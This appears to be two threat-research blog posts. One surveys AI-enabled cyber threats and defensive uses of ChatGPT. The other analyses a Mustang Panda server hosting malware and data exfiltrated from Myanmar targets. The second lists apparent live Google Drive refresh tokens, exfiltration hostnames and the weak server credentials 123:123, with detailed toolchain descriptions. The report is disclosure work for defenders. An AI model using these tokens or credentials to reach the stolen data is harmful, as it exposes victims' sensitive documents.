Deepfakes are a concerning and emerging form of technology that can pose serious threats to individuals and society as a whole. As a direct application of AI for malicious purposes, these convincing and highly realistic videos can make it seem like someone said or did something they never actually did. This is done by changing and manipulating the appearance and voice of the individual using AI. 

Deepfakes can have far-reaching consequences, leading to public outrage, damaged reputations, and even social or political instability. Moreover, deepfakes can be used for identity theft or fraud, as scammers can create videos or images that look like someone you know, tricking you into sharing sensitive information or inadvertently sending money to the attacker. 

An example of this was the case of the deepfake video depicting Ukrainian President Volodymyr Zelenskyy that appeared online not long after the onset of the war in Ukraine. This was a highly politically motivated deepfake that surfaced on various social media platforms. 

We’ve also observed attempts to use deepfakes as defense arguments. In this case, a lawsuit was filed against Tesla by a car accident victim’s family who claimed that Tesla’s automated driving software failed, while Tesla supposedly argued that the driver ignored warnings and was playing a video game while driving. The family’s attorneys aimed to depose Musk about his recorded statements from 2016, but Tesla opposed the request by suggesting the Musk statements were deepfakes and that, as a result, he can’t be held responsible. 

In the wild

While LLMs offer immense assistance to individuals seeking help with their everyday struggles, the same goes for the bad actors. Despite the safeguards put in place, we can already see attempts to create proof of concepts using a specific set of prompts, experimenting with the tools to create malware. 

In multiple examples, Check Point Research provides evidence that threat actors are investigating the use of ChatGPT for creating malware. For instance, a user on an underground hacking forum shared his efforts to create a functional information stealer, as well as claiming they were successful with creating multiple strains and techniques from publicly available write-ups. In another attempts, Check Point Research tried to prompt ChatGPT themselves to generate snippets of code which could be used in malware. 

Kaspersky, on the other hand, chose a different approach when they used ChatGPT to try to identify phishing based on a URL. Although the LLMs are not mature enough to do this yet, it shows the potential of the technology. With additional training and finetuning, it could become a viable detection method. 

The attackers don’t hesitate to try new tools and they will thoroughly test LLMs capabilities, including ChatGPT or other emerging models like WormGPT, in attempts to generate code (and text) for malicious purposes. Even though possible, the process of generating malware is still cumbersome and other development methods, like copying code directly from Github or StackOverflow, are still more straightforward and easier. 

We experimented with generative AI in our testing environment, aiming to simulate behaviors usually associated with malware. However, we faced similar challenges in the process. Many of our attempts led to a high error rate in the generated code, which demanded expertise in identifying and resolving these errors. Additionally, when a prompt that could potentially be perceived as suspicious was introduced, the security filter was triggered, essentially blocking further prompts. This necessitated initiating an entirely new chat, which significantly reduced the convenience of the overall experience. 

We agree that ChatGPT can save time while producing simpler techniques for the testing environment. It could be utilized by a skilled person to produce better results with the right prompts, but we also expect this person to be well-funded in the field, using obfuscation and other protection techniques anyway. 

At this point, less savvy users will likely get frustrated in their attempts to generate malware, resulting in copying codes from Github and StackOverflow anyway, always walking the simplest path. However, when tools without security filtering and restrictions occur, like WormGPT, this might change rather quickly. 

How ChatGPT can serve as a tool for helping researchers 

While we’ve explained how LLMs can be used for malicious purposes, they can also be used for good and to support researchers in their work. When using the services of AI tools, it’s important to verify the output and ensure that you’re not using any internal company data. After all, anything that is entered into an AI tool can be used for further training and potentially lead to a leak. Having a third-party agreement or NDA can help combat this risk, but this is definitely not the case with a public service like ChatGPT nor any other tool that is offered for free. 

Supporting analysts in understanding and writing detections 

Security analysts can use ChatGPT to prepare detection rules for them or, alternatively, to explain the existing rules when they’re in doubt about what exactly it is what they do. 

Detection languages that allow researchers to detect patterns (for example, in malware or its behavior), including Yara, Suricata, or Sigma, don’t reach the analyst-quality level of rules when created by LLMs. For junior analysts, however, the provided template can be useful–they can take it as a starting point and improve the detections from that baseline. 

Presented below is a pre-formatted Yara rule template. It’s prepared for an analyst to input malicious strings discovered in a Portable Executable (PE) file that’s less than 100 KB. Accompanying explanations are also included. It’s far from perfect, but a junior analyst can proceed from this point and try to further improve the ruleset by submitting additional queries and searching online. 

AI-based assistant tools 

Many new projects are emerging that incorporate LLM-based tools in the form of AI-based assistant tools that can assist users with basic or more complex tasks alongside other tools. In general, AI-based assistants promise to speed up work while the user focuses more on important problem solving, which ultimately delivers efficiency and increased productivity. 

There are AI-based assistant tools for office-style work, such as Microsoft 365 Copilot or Google Duet AI, as well as more technical projects for tech-savvy users. These tools often possess an extensive knowledge base and can provide instant access to documentation, libraries, and examples. This means the user gets better suggestions, autocompletion, instant access to documentation, and examples. 

For malware analysts, AI-based assistants can help with understanding the assembly, the disassembled code, or debugging. They can provide insights into function calls, data structures, and control flow, which saves time and effort in the reverse engineering process. 

It’s important to note that the more specific the field is, the more difficult it may be to create a helpful assistant. This is the case in a specialized field like reverse engineering; in this scenario, the functionalities provided by an AI-based assistant can be limiting. However, we can only expect the AI-based assistants to improve and be incorporated into more tools and applications as time goes on. 

Here’s a non-exhaustive list of some of today’s AI-based assistants and their proposed functions:

  • VulChatGPT: Helps with finding potential vulnerabilities in binaries. 
  • Windbg Copilot: Allows users to use ChatGPT capabilities directly in Windows Debugger. 
  • GitHub Copilot: Suggests code and entire functions in real-time using the OpenAI Codex. 
  • Microsoft Security Copilot: Designed to help defenders by assisting with breach identification, incident response, and understanding collected data. 
  • Google Cloud Security AI Workbench: This specialized LLM introduced by Google is a collection of AI tools that are designed to help with point-in-time incident analysis, threat detection, and analytics. 

We see a great potential in the AI-based assistant tools, especially when they get finetuned and specialized over time. Even though we didn’t study all the aforementioned tools in practice and detail, we were able to test the capabilities of two red-teaming tools, namely PentestGPT and BurpGPT

PentestGPT provides code snippets/tools syntax that the tester can use and it advises further actions based on the output provided by the tester. We’ve found the maturity of the tool is currently low, discovering many bugs and incompatibilities, and it provides generic suggestions. 

BurpGPT is an extension for Burpsuite which sends the requests/responses to a GPT model for evaluation and gives info about discovered vulnerabilities. While testing the tool and browsing an online service, the extension transmitted data to OpenAI. However, we didn’t receive any results, likely due to the absence of detected vulnerabilities. 

With the cloud-based tools, we quickly learned that due to the volume of data being transferred and used in the prompts, the costs of running such tools rendered them too expensive for everyday use, especially given the low quality of outputs. 

Furthermore, the users of AI-based assistant tools should carefully read the terms of use, privacy policies, and/or contracts of the services. For the tools to operate, users have to provide potentially sensitive information, possibly going against their interests or, in case of using the tools in the company environment, against the company security policies.

Explaining the functionality of code 

To better understand and defend against malicious threats, security analysts can use ChatGPT to request an explanation of a specific portion of code. Below, we can see an example–the code provided is that of a malicious SocGholish (FakeUpdate) landing page. When asked for an explanation of the code, ChatGPT was able to provide some insights into the function of the code’s specific fields.

This functionality can be useful both for analysts to learn new things and to point them in the appropriate direction in their studies.  

In a second example, ChatGPT delivered an explanation of a PowerShell script. The query attached to the code snippet was simply “explain”, which proved to be sufficient.

Image credit: Twitter
Image credit: Twitter 

In this scenario, ChatGPT didn’t provide a conclusion about what the script actually does. However, a junior researcher can use this output as a starting point to query for further details of what they don’t know. 

As with many evolving technologies, this approach isn’t bulletproof–while ChatGPT often can point analysts in the right direction, it can also do the complete opposite in certain cases. At the end of the day, analysts should maintain a critical eye of ChatGPT’s output and verify the content.  

It is important to mention that there is a limit to the size of the input, so defenders might need to analyze the code in parts. We can, however, expect this limitation will likely be much less noticeable in the future.

Deobfuscating and beautifying simpler scripts 

When prompted, ChatGPT can try to deobfuscate scripts that analysts provide. It can handle simpler obfuscators and beautify the output, making it more accessible to the analyst. 

For example, below is the deobfuscated script from the FakeUpdate example given in the previous subsection. 

The analyst can already see some artifacts that they might find useful–this can make the analysis much faster.

Pricing and privacy concerns 

These are two important aspects of using huge language models: Privacy and price. Privacy concerns stem from the fact that many online models use submitted data for further training, which can in some cases lead to internal company data leaks (as was the case with Samsung). For use cases in the security industry, one would often need to submit a part of code or an email for the AI to be able to provide insights. This could also lead to data leaks and isn’t acceptable. 

The second concern is price: According to estimates, running ChatGPT can cost the company as much as $700,000 each day. While this cost is likely quite high given the current popularity of LLMs and the resulting high volume of queries and inferences, it shows that running such models in-house to avoid privacy concerns is cost-prohibitive. Running these models requires high-performance graphics cards, which have recently been quite hard to come by and, in turn, significantly more expensive than their regular suggested price. 

Using an API access might not be cheap either. While testing several AI assistants, we’ve noticed that especially with larger inputs where additional data is provided (like pentesting assistants), the cost of operation raises very steeply, and the maturity of these tools just doesn’t balance the cost yet. 

Looking toward the foreseeable future, we expect to see significant cost reductions once tailor-made hardware has been developed and computational optimizations (like 8-bit matrix multiplication) are implemented to reduce the need for high-performance hardware. 

AI can hallucinate too! 

One big issue that we’ve encountered during our testing is that the models have the tendency to come up with responses that are simply untrue. This phenomenon is called hallucination.  

Take this example: In the following interaction, we asked for a vulnerability assessment. The model correctly identifies the type of vulnerability, but it points to a wrong function that causes it and makes up a couple of vulnerabilities that aren’t there at all. 

The same can be said for code generation–while code may look correct and run successfully, in some cases, it might not provide the correct results. For instance, we asked the model to generate code to pull articles from multiple subsites in WordPress. The model created a code that looked good at first sight and used the correct functions but didn’t work correctly. We only discovered the problems after putting the code into our staging environment and thoroughly testing it. This ended up being quite a tedious and time-consuming task, as finding bugs in somebody else’s code can become much harder than writing the code from the ground up. 

We expect more domain-specific LLMs to pop up in the future aiming at lowering hallucinations / false positives by being specifically trained for a particular use case. 

Staying safe

With the exponential growth of ChatGPT’s popularity, it’s no surprise that malicious actors have capitalized on its name to create scams or started using it with malicious intends in mind. However, there are a few tips to protect yourself and stay safer online: 

  • Beware of offers that are too good to be true: If an offer seems too good to be true, it most likely is.  
  • Verify the publisher and reviews: Always check the source and authenticity of the app or extension. Be suspicious of ratings that are only 5* and 1*, and reviews that look similar or are constructed in a similar way within a short period of time. 
  • Know the product you want to use: OpenAI offers the basic version of ChatGPT for free (after registration) on the official website. Any offer that contradicts this should be treated with caution. 
  • Avoid cracked software: Cracked or pirated software is a common method used by bad actors to distribute malware. 
  • Report suspicious activity: If you encounter a suspicious ad, application, or browser extension, use the report button to inform the provider. 
  • Keep your software updated: Make sure all your software, including your antivirus, is always up to date. 
  • Trust your cybersecurity provider: Avast is here to protect you no matter what you do online. We’re continuously working with our users to protect them against the latest threats. Report a malicious sample or false positive on our website. 
  • Educate yourself: There are many new articles every day about currently used and emerging cyber threats. 

The rise of AI technologies like ChatGPT has unfortunately brought with it an increase in scams and cybersecurity threats. However, with awareness, vigilance, and the right cybersecurity tools in place, users can protect themselves and continue to enjoy the benefits of these advanced technologies. Stay safe in the digital world! 

The post Insights into the AI-based cyber threat landscape appeared first on Avast Threat Labs.

Hitching a ride with Mustang Panda

2 December 2022 at 04:00

Avast discovered a distribution point where a malware toolset is hosted, but also serves as temporary storage for the gigabytes of data being exfiltrated on a daily basis, including documents, recordings, and webmail dumps including scans of passports from Asian, American and European citizens and diplomats applying for Burmese visas, from Burmese human rights activists and Burmese government institutions.

We recently came across a peculiar sample – a stager we believe is being used by Mustang Panda. The stager led us to the group’s distribution point, where we found malicious toolsets. We have analyzed the malware and were able to see relations between various campaigns that have been described by other cybersecurity firms over the course of the last years. Based on publicly published research and our own investigations, we can say with high confidence that the modus operandi and the malicious toolset show a strong link to a group related to Mustang Panda, which has previously been reported as a Chinese APT group. The group has been known for gathering intelligence on Mongolia, and further Asian countries, and most recently was suspected of targeting European entities.

The distribution point, an FTP server, is also used as a transition point for exfiltrated victim data, before the data is moved to an unknown location. We continue to observe new data being uploaded and moved from the point, meaning the campaign is still active, and has been going on for some time. Gigabytes of data are moved around, and the amount of data indicates severe compromise of many high-profile targets in Myanmar. The data types include various office documents and PDFs, stolen browser profiles, webmail dumps and even sound recordings. Browsing profiles were also extracted which can provide access to other infrastructures, services, and private data of the victims. Most of the stolen data seems to be in Burmese making it challenging to analyze. The sensitive data is mainly being collected from devices used by the Myanmar government, state administration, police, army, significant public organizations, or companies, and includes data related to diplomatic meetings, court hearings, military information, contracts and more.

Disclaimer: We have only seen partial snapshots of the exfiltrated data as they are deleted shortly after being moved from the distribution point, so it should be noted that the information we have on victims may be inaccurate or incomplete. Most of the documents are in Burmese, therefore, a language barrier has also to be taken into account. Finally, due to the limited scope and the sheer volume of the data, some assumptions had to be made during the research process. We have reached out to local CERTs, informing them of our findings.

Victimology

Nearly all of the victims have close ties to Myanmar and it seems that both the Burmese government and opposition groups are being targeted. We have seen data originating from various departments of several Burmese ministries. Even the Office of the State Administrative Council has been targeted. The government breach is not isolated to Myanmar – we have also seen Myanmar embassies among targets, for example, the embassy in Serbia. The data also contained dumps of a mailbox used to communicate in 2016 and 2017, as well as in 2020 with visa applicants from all around the world. These messages contained scans of passports from citizens and diplomats from various countries, such as China, Australia, Czech Republic, France, Israel, Netherlands, UK, and USA.

After such an extensive list of targets, it ought to be little surprise that Myanmar Police Force is also among the targets. Even some higher profile departments, such as the Office of the Information Police Chief or the Department of Special Investigation, seem to have been breached. Tatmadaw (Myanmar Armed Forces) is also not an exception – we have seen victims from the Bureau of Air Defense, Myanmar Army Engineering, and the United Wa State Army.

Political NGOs and the government’s opposition are also on the list of victims. It is possible that the list is even more extensive as we may not be able to find a straightforward association to said organizations as we would expect more common usage of personal computers or computers that are not centrally maintained by an IT department. We have seen data from devices belonging to the Karen National Union, Center for Diversity and National Harmony, National Reconciliation and Peace Centre, Ethnic Nationalities Affairs Center, and even the Union Civil Service Board.

Exfiltrated Data 

The most common file types being exfiltrated by the group are Microsoft Office documents (.docx, .xlsx, .pptx, etc.), PDF documents, and plain text files. Other file types exfiltrated include audiovisual data in various forms, including sound recordings (.mp3), and pictures (.jpg, .png, etc.) or drawings. Emails, including entire conversations are also exfiltrated.

It appears that the attackers are also looking for and collecting data from browser profiles from various web browsers, e.g. Chrome, Firefox, Opera, and more, a serious threat to victims’ privacy. The stolen browser profiles can provide access to other infrastructures, services, and the victims’ private data of the victims. The attackers are extracting information about browsing history, stored credentials (personal and work), credit cards, used tokens, and valid cookie sessions. Consequently, poorly secured services, such as services without two-factor authentication or without a safe cookie policy, can be easily abused by attackers. Attackers can steal the identity of victims and can use their email, Facebook, Telegram, or other accounts to collect additional information about the victim and their family, friends, and activities.

Highly sensitive data is being collected from victims’ computers, and, in most cases, these are computers used by the Myanmar government, state administration, police, army, significant public organizations, or companies. This in some cases included sensitive data and information belonging to international citizens and diplomats who have interacted with targeted departments.

The documents, and audiovisual data being exfiltrated by the group is massive. The files include everything from:

  • Email dumps including visa applications and scans of passports belonging to citizens and diplomats from various countries, such as China, Australia, Czech Republic, France, Israel, Netherlands, UK, and USA
  • A seating plan for the meeting between former US Ambassador to the United Nations Bill Richardson and Myanmar’s leader, Senior Gen. Min Aung Hlaing 
  • Myanmar’s constitution with proposed changes
  • Invitations for diplomatic meetings, meeting programs, calls, and talking points
  • Reports, maps, and screenshots from the Signal messaging app related to the UWSA (United Wa State Army)
  • Data from the Office of the Chief of Myanmar Air Defense Force, including meeting minutes, full staff/rank lists, photo IDs (some with fingerprints), salaries, personal details of employees’ families
  • Peace treaty documents
  • Interrogation reports
  • Contracts
  • Court hearings
  • Town plans
  • Contact information for police officers, including their names, addresses, telephone numbers, and salaries
  • Transcripts of meetings around politics, and elections
  • Meeting minutes and audio recordings of meetings between Myanmar senior officials (Prime minister, Chairman of State Administrative Council) and the President of Tatarstan
  • Military buildings drawings, including munitions storage, oil storage and aerial photos of proposed sites 
  • International banking records and records and transfers from supporters to a refugee group

Ties to known campaigns

Since getting our hands on the distribution point, we have established links between known campaigns already publicly reported and what we have discovered. This gives us clues as to how resourceful the group may be and will also help us assess its modus operandi.

We have found files strongly resembling (or even matching) samples and their relations described in a blogpost by ESET around the Korplug variant dubbed Hodur. The campaign they described was targeting various government organizations in Mongolia, Vietnam, and Myanmar, along with politically-oriented NGOs. This is in alignment with the victimology of the stolen data we have seen on the distribution point. Hodur was attributed to the Mustang Panda group. The related part of the uncovered toolset we analyzed also contained a USB launcher written in Delphi, similar to the one seen accompanying the Hodur variant of Korplug analyzed by ESET. This installer is responsible for firing up the infection chain leading to a variant of Korplug RAT.

Similarly, we’ve found similarities to operations attributed to LuminousMoth both in structure and purpose. For instance, we have seen a very similar structure as the one described in Bitdefender’s research on the LuminousMoth group. Namely, the usage of the same binaries for sideloading, same pattern for exfiltration – using RAR for collection and a sideloaded library for exfiltration via Google Drive. Perhaps the most common pattern was the usage of a USB launcher written in Delphi that was attributed to Mustang Panda, which was also described in Bitdefender’s research.

In some cases, we have seen some unreliable links to older campaigns such as Operation NightScout, a rather old KMPlayer supply-chain attack, or Operation Harvest. Namely, binaries used for sideloading or names of encrypted payloads matched the ones used in these old campaigns. Nevertheless, the specific payloads differ significantly, so while some of these were attributed to Mustang Panda, the similarity could also be coincidental.

Toolset overview

The storage we have discovered contains many archives with various tools to be downloaded by infected victims. We will use names of these archives to impose basic structure on the data we have found. It is worth noting that these names are partially consistent in successive versions. For instance, we have found an archive KKL which was later on accompanied by another version with a slightly different configuration called KKL1.

Some archives contained complete toolsets, whereas others only had single purpose tools in them that were meant to be used in connection with other tools; for instance, one contained a keylogger that obviously lacked any exfiltration functionality. This provides a strong indication that the tools are intended to be used modularly. We will build upon that and first talk about the usual Mustang Panda theme – Korplug. Then we’ll get to the more specific tools and end with the single purpose tools. Notably, nearly all the tools, aside from Korplug, its loaders, and Delphi installers, haven’t been described before. The RAT written in Go (JSX) or the  modular backdoor (US_2) deserve an extra mention due to their complexity 

From the data we have seen, we conjecture that the main exfiltration tools are variants of tools contained in archives named GDU, which use Google Drive for the exfiltration. Since we haven’t seen any exfiltration tool that uses the distribution point directly and the path on the server of exfiltrated files contains gd, we presume that the responsible group uses some other tools to move files from various Google Drives to the distribution point we saw.

A brief look at the toolsets brings up another interesting fact: almost all the files show approximately (up to a few cases within seconds) a seven or eight hour offset between the compilation timestamp and the “last modified” timestamp of the file itself. Since the compilation timestamp is usually in UTC and the archives use the local time for the contents’ last modification date, this places us at UTC-8 and UTC-7. Therefore, we presume that the build setup operated in a time resembling Pacific Standard Time (PST) and Pacific Daylight Time (PDT), used on the West Coast of the United States. There are a few caveats – SE3 and SE4 contain files that were compiled on November 1, 2021 and still have an eight hour offset even though none of the countries using PST/PDT transitions to PST that early (both USA and Canada transition to PST a few days later).

There is also a file with an obviously spoofed compilation timestamp. HT3 contains a DLL Vender.dll whose compilation timestamp dates more than a month after the last modification date. This further weakens hypotheses that build upon timestamp offsets. Unfortunately, we have no further leads explaining this outlier. The latest version of the uploader (multiUpload.exe), whose usage was spotted at the beginning of June, has a compilation timestamp of January 3, 2020. This is also very likely spoofed as analyses of the previous versions of this tool show clear evolution and, according to their respective timestamps, they were all compiled in April 2021. Not to mention that the corresponding infrastructure was only created at the end of May 2022.

The folder /pub/god, which contained the toolset archives, was removed on June 25, 2022. On the same day, a new folder /pub/god1 was created with two files to which we didn’t have read access. Two days later, the new folder was gone and /pub/god appeared again with a subset of the original tools.

Variations on Korplug

The first group of tools that we’ll introduce are various versions of Korplug. The binaries used for side-loading were already seen before. Even though the loaders were mostly new, they were rather uninteresting. A common theme was a Delphi binary that served as a launcher to be executed from an infected USB drive. As we’ve already mentioned, a similar installer was previously seen in campaigns attributed to Mustang Panda. It just executes the Korplug loader from a folder named “Kaspersky” that is on the very same USB drive. See the diagram below (based on a toolset from an archive named BMD) for more details. 

Note the usage of the folder name “Kaspersky” and usage of “Symantec” in the names of the executables; since the launcher relies on social engineering tricks, it depends on a common strategy using seemingly legitimate file names to dispel any doubts concerning the content.

Contents of an archive called BMD. Archive YK41 follows the same structure, with ShellselDb.dat being replaced with hp_ui.xslbcdsj and without the Delphi launcher.

There were also simpler infection chains, containing just a signed clean binary, a loader to be side-loaded, and an encrypted Korplug. These were contained in archives WD, 127C, and 1260M. The latter interestingly used the OleView.exe binary which then side-loaded the ACLUI.dll that decrypted and executed ACLUI.DLL.UI. The same signed binary, which surprisingly also has the same name of the encrypted payload, was used in the KMPlayer supply-chain attack in 2013. The accompanying research was only published in Chinese, likely due to the attack being limited to a few devices.

Exfiltration toolset

The exfiltrated data on the server in /pub/gd folder showed perfect correlation to the data produced by GDU toolsets (GDU_OLD, GDU, GDU1, GDU2, GDU1_NEW, GDU3, GDUPIZ). These tools collect the files on the victim’s disk, pack them into an archive whose name is prefixed with the victim’s ID and upload that archive onto a Google Drive. We presume that the name GDU is an acronym for Google Drive Uploader. While the tools themselves were technically rather simple, the exfiltration process and their evolution piqued our interest.

The analysis of the exfiltration process brought up several interesting observations. A few days after May 24, 2022, the day we started systematically monitoring Google Drives used for the exfiltration, we started to see more frequent token changes and new features being implemented. These features mitigated possible downtime caused by the migration to a new token. Since Google Drive has extensive logging functionality and the tokens have to be present on the infected devices, it is only a reasonable expectation that access to these drives is monitored to some extent.

On the contrary, we have not seen such behavior with the distribution point. This could be attributed to the fact that the distribution point is never exposed by the toolsets, which brings us to the assessment that the group presumes the distribution point to be secret or not worth monitoring.

Timeline of GDU exfiltration toolsets

Version overview

The oldest version GDU uses RAR executable to collect the data and an encrypted rar.dat to store parameters for the RAR binary. Starting from GDU_OLD, they migrated to their own collector piz.exe (this functionality was later moved to a DLL to be side-loaded) and retained an encrypted rar.dat where they stored their configuration. These toolsets also rely on two optional configuration files that are backed up by hard-coded values: token.dat containing an encrypted token for Google Drive and time.ini that contains last execution date along with the victim’s ID. The setup and the choice of binaries for side-loading bears resemblance to the LuminousMoth campaigns and tooling.

An archive GDU that contains a version relying on RAR instead of piz.exe for data collection.

The exfiltration process is usually handled by a variant of MyUpload.dll that is supplemented by the aforementioned configuration files. Quite recently, a new version of GDU1 has appeared on the distribution point (which we’ll call GDU1_NEW)  which came with its successor multiUpload.exe. multiupload.exe eschews hard-coded tokens and makes the exfiltration process more resilient to disruptions.

Archive GDU_OLD that uses its own collector piz.exe to collect potentially interesting files before the exfiltration.

The version we are calling GDU_OLD is basically the same as GDU1 and GDUPIZ, the most significant difference being a different PE being used for side-loading. GDU1 and GDUPIZ rely on CefSub.exe and subsequently on CefBrowser.dll instead of AtlTracetool.exe. GDUPIZ also uses a slightly different approach to execute the file collection tool piz.exe – the version included in this folder is in fact a renamed clean binary spoololk.exe which in turn side-loads vntfxf32.dll. This malicious binary implements the file-collecting functionality formerly contained in piz.exe. GDU2 is basically the same as GDUPIZ.

On June 8, 2022, we saw a new GDU1 toolset on the distribution point. This time MyUpload.dll has been upgraded to provide redundancy in the exfiltration process. It no longer uses token.dat but rather uses a Github repository as its source for the token. If this fails, there are two backups – one using HTTP PUT to www.watercaltropinfo[.]com with Basic HTTP Authorization (123:123). The other sends the data via HTTPS POST to m.watercaltropinfo[.]com. The collector is the same as in GDUPIZ. GDU3 uses basically the same process but uses different PE for side-loading (FwcMgmt.exe).

Tokens

A special chapter is devoted to Google Account tokens that are used in these tools, partially because our research may have forced the group’s hand to refresh the tokens once they discovered that we knew of their Google Drives. The fact that after each token decommission, every client had to have the token updated and that GDU toolsets do not have any remote update functionality suggests that these toolsets have to be accompanied by other tools that provide this update functionality. We have noticed a longer delay between the decommissioning of the token from May 29, 2022 and before a replacement token was being distributed. Its distribution coincides with the time a new version of GDU1_NEW was released. It’s exactly this version that has introduced new functionality in the exfiltration tool, namely smoother token swapping and failsaves for cases when Google Drive exfiltration fails. Therefore, we presume that this delay was caused by the development of this new functionality.

SourceRefresh TokenMetadata
GDU/GDU_OLD1//030YFi1XWWVY2CgYIARAAGAMSNwF-L9Ir_I6Aqhg4gn3UWyi3I5J_6q4VxHPYNkit3x9RtlpVkFCEOD4KU-E2u7NghS0hx5nPU8YFirst seen: 22.4.2021Not accessible
Distribution point1//0clbh_CVKereiCgYIARAAGAwSNwF-L9IrtPxC9zt-onaeeq2gTUwZTVa8f8ILvDYM8dyVVjmmKmNr5Pnsi27iMjLll2dxbDRxUQsFirst seen: 22.4.2021Not accessible
GDU1/GDU2/GDUPIZ1//0cZLNy7GH0LknCgYIARAAGAwSNwF-L9IrV7aXKTZb-WQM1aqXkjX0ph25dTZngOYAUlAXHB1NvCorgw62XI_TXsWNrK98KBYfbpAFirst seen: 17.3.2022Our first access: 24.5.2022Usable until: 26.5.2022
Distribution point1//0e29aixufumhCCgYIARAAGA4SNwF-L9IrX2w0GnjBQe4g5hQWKJlXjIQF7XZBnQ9VKArYhJVwOayZq9Ad-G8YHbsptTN5DhfXI2EFirst seen: 29.5.2022Our first access: 29.5.2022Usable until: 3.6.2022
Github1//0ewRnXWCf2AunCgYIARAAGA4SNwF-L9IradANDPAvIqPOaIfReqT1fQ0GO5A9FnUhdpdI0Q0V1IRye5RbTi-hcGQbbHKgDc02xfMFirst seen: 8.6.2022Our first access: 8.6.2022Still usable

Temporal analysis of exfiltrated data

We can also have a look at the metadata of the exfiltrated archives. What is rather unsurprising are the upload times which closely coincide with Burmese business hours – a smaller peak in the morning and a huge peak in the afternoon. Note that Myanmar is in UTC+6:30 time zone and China, presumed land of origin of Mustang Panda, is in UTC+8.

What is more interesting are events produced by the group itself – transfers from Google Drive onto the distribution point and deletion of files from the distribution point. The huge peak is around 18:00 MM time which coincides with the end of the work day in Myanmar. The spread of starts of upload windows is negligible, leading us to the presumption that the transfer is automated. We have seen a few archives being placed in the wrong directories which could indicate that the tooling is still under development or there’s still some manual work involved… Usually, the files have accumulated during the day on Google Drive and were transferred to the distribution point in the evening MM time.

As we already mentioned in the introduction of uncovered tools, we have found quite a lot of files that were “missing” something. By that we mean that on their own, they were either lacking communication functionality or implemented some techniques that were useless without being accompanied by another payload. Interestingly, while these were also using side-loading, they were not relying on external encrypted files, making their execution flow straightforward with 2-point graphs. For the sake of brevity, we will list these in a table:

ArchiveClean executableSideLoaded DLLPurpose (high-level)
MG/MG44dabs.ex/44.exSensorAware.dllfingerprinting/remote shell
AUDmcsync.exmcaltlib.dllaudio recording
CHRbrowser.exbrowser_elf.dllCookie dumping
T3YKygfdt.execorecrl.dllremote shell
UCmelt_64.exelibmlt-6.dllUAC bypass
KKL/KKL1mscorsvw.exemscorsvc.dll (contains KBE.dll)clipboard stealer, keylogger
Archive KKL contained a straightforward stealer in KBE.dll that was also hard-coded (in an encrypted form) in mscorsvc.dll from which it was unpacked after side-loading. The newer KKL1 was practically the same.

There are also a few standalone files such as x.ex in archive X which composes logs of registry entries (Run), services, and scheduled tasks along with checking all signatures of executable files in %WINDIR%. Archive NB contains nb.dat which is just the nbstat utility executable. There was also a coinminer in the archive INFO along with its encrypted configuration file.

An interesting utility is DISK2 (and its variant DISKM); it is responsible for monitoring the system drive for any changes. Both are accompanied by a configuration file that defines which files are of interest and where such files should be copied to. It also notifies its C&C server about these files via an encrypted message over HTTP. There is also a version of this tool named MF20211228 that does not contain any configuration file and does not copy files anywhere, it just sends messages to the C&C server.

Contents of an archive DISK2. This toolset is responsible for monitoring the system drive for any changes in files defined by its configuration.

Oddballs in the collection

JSX

JSX archives (JSX86 and newer JSX861 for 32 bit version and JSX64 and newer JSX641 for 64 bit version) deserve a separate mention as they use a rather uncommon setup; a JavaScript file is at the beginning of the chain and instead of side-loading, the respective DLL is launched as a service. mozload.dll is a RAT written in Go that uses HTTPS and websockets for its communication. Interestingly, the RAT uses TLS Client Authentication; see Appendix A.1 and Appendix A.2 for the private key and the certificate.

The execution flow of the packages from JSX archives.

HT3

HT3 simply does not fall into any of the previous categories – it is a backdoor with external configuration accompanied with a shellcode loader and UAC bypass.

Execution flow of HT3. Note that it contains both 32 bit and 64 bit versions of an UAC bypass tool.

SE

Now we are finally getting to a more complex setup. These archives include several versions with very similar structures and sometimes with varying payloads. Functional changes are presented below; note that these do not include changes in side-loading which will be discussed later on. All versions feature a few evasion tricks that use registry tricks to hide files and file extensions.

VersionVersion changes
SE1Uses volume name for USB installer executable
SE3/SE4/SSEUses Delphi launcher (the one attributed to Mustang Panda), persistence integrated into LPVDPOCX.OCX (equivalent of facesdk.dll from SE1)
SE5Uses volume name for USB installer executable, rollbacks to old USB installer
SE6No significant functional changes
SE7No significant functional changes

SE3 and therefore also SE4 and SSE (which are mostly the same) use vivaldi.exe and vivaldi_elf.dll for its evasion module. Also, FacialFeatureDemo.exe and facesdk.dll are replaced by Symantecs.exe and LDVPOCX.OCX; the latter integrating persistence into itself instead of having it in a separate module. Interestingly, the USB installer has been replaced with one similar to the one in the archive BMK; a Delphi launcher that executes Symantec.cmd which is actually Symantecs.exe. These versions are also the only ones that have renamed 3 of 4 payload bundles (using csdkset.dat for backdoor, EdrEpmpCStorages.dat for USB installer, and PchEpmpCStorages.dat with WTSAPI32.dll). Confusingly, WTSAPI32.dll does not seem to be used anywhere and will be used for side-loading by later versions when the USB installer replacement is roll-backed.

SE6 and SE7 abuse old Avast’s proxy executable wsc_proxy.exe to side-load wsc.dll which serves as the dispatcher. Aside from this change, there are no other significant changes to the functionality.

The schema of contents and the control flow of SE1. In newer versions, the persistence module is integrated in the dispatcher.

U5_2

The last complex toolset that we will present is from the archive U5_2. Most of the functional code is encrypted and bundled in AtiVir.csc. With the exception of a  chain to a removable drive watcher, all the parts share similar XOR keys: user_panda_%section_name%; a rather interesting choice if the toolset really belongs to Mustang Panda.

An interesting part of the toolset is a file install_.exe that reads a file from a given path, takes the serial number of the volume where the file is located, computes MD5 hash from the serial number and changes the  first bytes of the file to the hex-encoded computed hash value.

The schema of contents and the control flow of U5_2.

Server infrastructure

The distribution point is an FTP server located in Malaysia that is accessible without a password (username anonymous, password is empty). We have also encountered a different FTP server in late 2020 containing very similar archives to the ones we now know contain exfiltrated data. Unfortunately, we did not have enough information to process the archives it contained. We presume that these two FTP servers were closely related or that even the current FTP server may be successor of the one we found previously.

We have noticed that the FTP server has stopped responding in October. Fortunately, the server itself was still alive and the distribution has migrated to using HTTP instead of FTP. They also started using HTTP Authorization; nevertheless, they have reused a weak username:password combination (123:123). This has caused a downtime of a few days in our tracking, but with a quick fix, we’ve managed to get back on track. Presumably, this might have been another attempt to foil our tracking attempts.

Our telemetry data also revealed another server in Russia. A client from Myanmar tried to download an archive XYZ from it via HTTP. Upon further inspection, the archive was found to be identical to XYZ from the aforementioned FTP server. We have tried to crawl the server for archives and files we have already seen on the FTP server and found the following toolsets:

Archive on the HTTP serverMatching archive on the FTPNote
gdupiz.rarGDURetrieved from our telemetry
xcrs.exeXDiscovered by crawling
jsx861.rarJSX861Discovered by crawling

